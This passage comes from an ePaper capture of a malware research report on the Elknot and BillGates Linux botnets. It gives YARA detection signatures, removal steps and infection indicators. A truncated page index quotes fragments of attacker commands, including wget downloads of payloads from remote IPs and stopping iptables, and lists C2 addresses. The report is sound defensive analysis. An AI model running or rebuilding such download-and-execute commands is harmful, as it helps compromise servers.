NTRG_ElasticBotnetReport_06102015

Recommendations

Info

ule Elknot_dropper { meta: author = “Novetta Advanced Research Group” description = “Detection of the Elknot dropper related to the Elasticsearch vulnerability attacks after UPX is removed” strings: $ = { 2F 70 72 6F 63 2F 73 65 6C 66 2F 65 78 65 00 63 70 20 25 73 20 25 73 00 25 73 20 25 73 20 31 00 63 70 20 25 73 20 25 73 61 00 } condition: all of them } rule Elknot_malware { meta: author = “Novetta Advanced Research Group” description = “Detection of the Elknot malware related to the Elasticsearch vulnerability attacks” strings: $ = “13CThreadAttack” $ = “%7s %llu %lu %lu %lu %lu %lu %lu %lu %llu %lu %lu %lu %lu %lu %lu” $ = “fake.cfg” $ = “[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %s” condition: all of them } Removal of the BIllGates malware is more problematic than the removal of the Elknot malware. The BillGates malware does introduce persistence by means of establishing not only a service within the /etc/rc.d directories, but also by installing a startup command in the /etc/rc.local file during the initial infection phase. It is advisable to reimage any server compromised with BillGates in order to ensure that the infection is completely removed. Otherwise, administrators should take due diligence in looking for new files introduced into the /usr/bin directory as well as new services introduced in the various /etc/rc.d directories. The following YARA signatures can help locate BillGates malware. rule BillGates { meta: author = “Novetta Advanced Research Group” description = “Detection of the BillGates malware” strings: $ = “CThreadClientStatus” $ = “CLoopCmd” $ = “/tmp/gates.lock” condition: all of them } THE ELASTIC BOTNET REPORT 60
One common indicator of a BillGates infection is the existence of /tmp/moni.lock as well as /tmp/bill.lock files on the victim’s machine. Additionally, directories off the /usr/bin directory containing the name bsd-port may be suspect. THE ELASTIC BOTNET REPORT 61
Page 1 and 2:
THE ELASTIC BOTNET REPORT EXECUTIVE
Page 3 and 4:
As a result of the above query, the
Page 5 and 6:
Researchers Peter Kálnai and Jarom
Page 7 and 8:
If the dropper is executed with 1 a
Page 9 and 10: The CStatBase class captures inform
Page 11 and 12: There are 2 types of messages curre
Page 13 and 14: struct Beacon { } unsigned int dwCP
Page 15 and 16: found, CThreadAttack::ProcessMain e
Page 17 and 18: The following diagram illustrates t
Page 19 and 20: 2.4.1.3 CSubTask.taskType = 0x82: P
Page 21 and 22: It is worth noting that, of all of
Page 23 and 24: The use of a raw network socket pro
Page 25 and 26: The contains a value between CSubT
Page 27 and 28: Structurally, the BillGates binary
Page 29 and 30: CSysTool::SelfInit uses the three s
Page 31 and 32: If the global variable g_bDoBackdoo
Page 33 and 34: Regardless of the communication mod
Page 35 and 36: COMMAND EXPLANATION count 0 Sets th
Page 37 and 38: 3.2.1 BILLGATE’S “NORMAL” DOS
Page 39 and 40: • /bin/netstat • /bin/lsof •
Page 41 and 42: getty 15959 root 6u IPv4 1577210 0t
Page 43 and 44: 13 222.186.21.120 222.186.21.120:66
Page 45 and 46: 18 60.169.75.99 60.169.75.99:3113 w
Page 47 and 48: 219.235.4.22 219.235.4.22:7878 sos
Page 49 and 50: m * service iptables stop wget http
Page 51 and 52: wget -O /tmp/wocao http://198.13.96
Page 53 and 54: 4.1.10 INFRASTRUCTURE-TTP CLUSTER J
Page 55 and 56: 1.The bulk of the HFS instances hav
Page 57 and 58: With regards to the targeted port,
Page 59: While the Elknot malware does not h
show all

NTRG_ElasticBotnetReport_06102015

Create successful ePaper yourself

Delete template?

Save as template?